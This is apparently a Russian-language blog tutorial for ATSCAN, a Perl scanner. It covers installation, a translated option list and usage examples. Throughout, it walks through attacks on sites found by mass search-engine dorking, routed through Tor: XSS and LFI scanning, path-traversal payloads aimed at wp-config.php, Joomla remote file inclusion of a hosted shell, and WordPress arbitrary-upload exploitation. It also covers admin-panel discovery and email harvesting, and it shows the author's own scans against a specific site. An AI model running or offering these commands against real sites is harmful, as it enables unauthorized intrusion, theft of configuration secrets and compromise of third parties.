Thank you for reading this post, don't forget to subscribe!
статья хорошо описана тут:
ставим:
yum install perl-libwww-perl.noarch
yum install perl-Crypt-SMIME
yum install perl-Params-Validate perl-CGI perl-CPAN
git clone https://github.com/AlisamTechnology/ATSCAN
chmod +x ./atscan.pl
chmod +x ./install.sh
./install.sh
./atscan.pl --update
Если нужно будет удалить:
atscan --uninstall
--proxy | Настройка tor прокси для сканирований [Напр.: --proxy socks://localhost:9050]
| Настройка прокси [Напр.: --proxy http://12.45.44.2:8080]
| Настройка списка прокси [Напр.: --proxy list.txt]
--random | Продлить идентичность для каждой просканированной ссылки.
rang(x-y) | Напр.: --exp /index.php?id=rang(1-9) --xss ИЛИ -t site.com/index.php?id=rang(1-9) --xss
| site.com/index.php?id=1->9
repeat(txt-y) | Напр.: --exp /index.php?id=repeat(../-9)wp-config.php --xss ИЛИ -t site.com/index.php?id=../wp-config.php
| site.com/index.php?id=../wp-config.php then site.com/index.php?id=../../wp-config.php 9 times
--dork | -d | Дорк для поиск [Напр.: house,cars,hotel]
--level | -l | Уровень сканирования (+- Количество страниц с результатами для сканирования)
--ip | Обход для получения IP
--regex | Обход для получения строк, соответствующих регулярному выражению
--sregex | Получить только url с соответствующим регулярным выражением
--noquery | Удалить строку запроса из url. [url становятся примерно такими: site.com/index.php?id=]
--time | установить тайм-аут браузера.
--valid | -v | Проверять строкой.
--ifinurl | Текст для проверки целевого url
--status | Проверить по статусу http заголовка.
--unique | Получить цели с точным соответствием дорку.
--exp | Эксплойт/Полезная нагрузка
-t | Цель [http://site.com]
-p | Задать параметр для тестирования Напр.:id,cat,product_ID
-m | Установить поисковый движок. По умолчанию bing Напр.: -m [Bing: 1][Google: 2][Ask: 3][Yandex: 4][Sogou: 5][Все: all]
--xss | Xss сканирование
--lfi | Локальный инклуд файлов
--joomrfi | Сканировать joomla на локальное внедрение файлов
--shell | Ссылка на шелл [Напр.: http://www.site.com/shell.txt]
--wpafd | Сканировать сайты wordpress на произвольную загрузку файлов
--admin | Поиск админок
--shost | Поиск поддоменов
--tcp | TCP порт
--udp | UDP порт
--sites | Сайты на сервере
--wp | Сайты WordPress на сервере
--joom | Сайты Joomla на сервере
--upload | Получить сайты с выгружаемыми файлами на сервере.
--zip | Получить сайты с zip файлами на сервере
--md5 | Конвертировать в md5
--encode64 | Кодировать строку в base64
--decode64 | Декодировать строку base64
--post | Post данные. Смотри примеры
--host | Доменное имя [Напр.: site.com]
--TARGET | Будет заменено целью во внешней команде
--HOST | Будет заменено хостом во внешней команде
--command | Внешняя команда для выполнения
--replace | Строка для замены
--with | Строка на которую менять
--full | Удалить все параметры url parametres из строки в конце url
--email | Получить email
--save | -s | Сохранить сканирование.
--nobanner | Спрятать банер инструмента
--beep | Воспроизвести звуковой сигнал, если найден положительный результат сканирования.
--ifend | Воспроизвести звуковой сигнал, при завершении процесса сканирования.
--noinfo | Перепрыгнуть информацию о дополнительных результатах.
--pause | Поставить на паузу, когда найден первый результат.
--options | Показать опции сканирования.
--update | Обновить инструмент
Примеры запуска ATSCAN
-------------------------------------------------------------------------------
Прокси:
Tor: --proxy <proxy> [Напр.: socks://localhost:9050].
Прокси: --proxy <proxy> [Напр.: http://12.32.1.5:8080] | --proxy <list.txt>.
Случайный: --random
-------------------------------------------------------------------------------
Поисковые движки:
Поиск: --dork <дорк> --level <уровень>
Поиск: -d <дорк> -l <уровень>
Установить движок: --dork <дорк> --level <уровень> -m [Bing: 1][Google: 2][Ask: 3][Yandex: 4][Sogou: 5][Все: all]
Установить выбранные движки: -d <дорк> -l <уровень> -m 1,2,3..
Искать по многим доркам: --dork <dork1,dork2,dork3> --level <уровень>
Искать и рандомизировать: -d <дорк> -l <уровень> --exp "/index.php?id=rang(1-9)" --xss
Получить сайты сервера: -t <ip> --level <значение> --sites
Получить сайты сервера на wordpress: -t <ip> --level <значение> --wp
Получить сайты сервера на joomla: -t <ip> --level <значение> --joom
Получить сайты сервера с выгрузкой файлов: -t <ip> --level <значение> --upload
Получить сайты сервера на с файлами zip: -t <ip> --level <значение> --zip
Произвольная загрузка файлов WP: -t <ip> --level <значение> --wpafd
Joomla удалённый инклуд файлов: -t <ip> --level <10> --joomfri --shell <ссылка на шелл>
Поиск + установка файла для сохранения: --dork <dorks.txt> --level <уровень> --save
Замена + Эксплойт: -d <dorks.txt> -l <уровень> --replace <строка> --with <строка> --valid <строка>
Замена + Эксплойт: -d <dorks.txt> -l <уровень> --replace <строка> --with <строка> --full --valid <строка>
Поиск + получить email'ы: -d <dorks.txt> -l <уровень> --email
Поиск + получить email'ы сайта: --dork <site:site.com> --level <уровень> --email
Поиск + получение IP: --dork <дорк> --level <уровень> --ip
Поиск по регулярному выражению в url: --dork <дорк> --level <уровень> --sregex <регулярное выражение>
-------------------------------------------------------------------------------
Сканирования с регулярными выражениями:
Использовать регулярное выражение: [--dork <dork> | -t <target>] --level <уровень> --regex <регулярное выражение>
Напр.: Для получения IP ((?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?).){ 3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))
Напр.: Для получения mail'ов ((([A-Za-z0-9]+_+)|([A-Za-z0-9]+\-+)|([A-Za-z0-9]+\.+)|([A-Za-z0-9]+\++))*[A-Za-z0-9]+@((\w+\-+)|(\w+\.))*\w{1,63}\.[a-zA-Z]{2,6})
-------------------------------------------------------------------------------
Подсканирование из поисковой машины:
Эксплуатация: --dork <дорк> --level <10> [--xss | --lfi | --wp |...]
Серверная эксплуатация: -t <ip> --level <10> [--xss | --lfi | --wp |...]
Замена + Эксплойт: --dork <дорк> --level <10> --replace <строка> --with <строка> --exp <эксплойт> [--xss | --lfi |...]
-------------------------------------------------------------------------------
Проверка:
Поиск + Url валидация: --dork <дорк> --level <10> --ifinurl <строка>
Поиск + валидация дорка: --dork <дорк> --level <10> --unique
Поиск + Эксплойт + Валидация: --dork <дорк> --level <10> --exp [--status <код>| --valid <строка>]
Поиск + Серверный эксплойт + Валидация: -t <ip> --level <10> --exp [--status <код> | -v <строка>]
Замена + Эксплойт: --dork <дорк> --level <10> --replace <строка> --with <строка> --full [--status <код>| --valid <строка>]
Замена + Эксплойт: --dork <дорк> --level <10> --replace <строка> --with <строка> [--status <код> | --valid <строка>]
-------------------------------------------------------------------------------
Использовать список / Цель:
-t <target | targets.txt> --exp [--status <код> | --valid <строка>]
-t site.com?index.php?id=rang(1-10) --xss
-t <target> --exp "/index.php?id=rang(1-10)" --xss
-t <target | targets.txt> [--xss | --lfi | --wp |...]
-------------------------------------------------------------------------------
Порты сервера:
-t <ip> --port <port> [--udp | --tcp]
-t (ip start)-(ip end) --port <port> [--udp | --tcp]
-t <ip> --port (port start)-(port end) [--udp | --tcp] --command <ваша внешняя команда>
-------------------------------------------------------------------------------
Кодировать / Декодировать:
Генерация MD5: --md5 <строка>
Кодировать base64: --encode64 <строка>
Декодировать base64: --decode64 <строка>
-------------------------------------------------------------------------------
Данные Post:
Post data: --post <field1:value1,<field2:value2>,<field3:value3>
--post "name:userfile,value:file.txt
Использовать список: --post "/Desktop/list.txt
Post + Валидация: --post "name:userfile,value:file.txt" -v <строка> | --status <код>
-------------------------------------------------------------------------------
Внешние команды:
--dork <dork | dorks.txt> --level <уровень> --command "curl -v --TARGET"
-t <target | targets.txt> --command "curl -v --TARGET"
Эксплойт произвольной загрузки файла dl-skin.php в WordPress:
atscan -d "index of /lib/scripts/dl-skin.php" -l 20 -m 2 --replace "scripts" --with "scripts/dl-skin.php" --full --ifinurl "lib/scripts" --command "php WP-dl-skin.php-exploit.php --TARGET"
-------------------------------------------------------------------------------
Множественное сканирование:
--dork <дорк> --level <10> --xss --lfi --wp ..
--dork <> --level <10> --replace <строка> --with <строка> --exp <эксплойт> [--xss | --lfi | --wp |...]
-t <ip> --level <10> [--xss | --lfi | --wp |...]
-t <цели> [--xss | --lfi | --wp |...]
-------------------------------------------------------------------------------
Обновить инструмент:
--update
-------------------------------------------------------------------------------
Удалить инструмент:
atscan --uninstall
-------------------------------------------------------------------------------
Найти список дорков можно погуглив например:dork for sql 2017
полученный список сохраняем.
Мои примеры:
perl atscan.pl --level 10 -m 1 -t http://site.kg/index.php --sql --lfi --shost --admin --tcp --udp --nobanner --save /root/ATSCAN/ATSCAN/otchet.txt
сканирование по списку дорков:
perl atscan.pl --level 10 -m 1 --sql --nobanner --dork ./dorks/dork01.txt --save /root/ATSCAN/ATSCAN/otchet.txt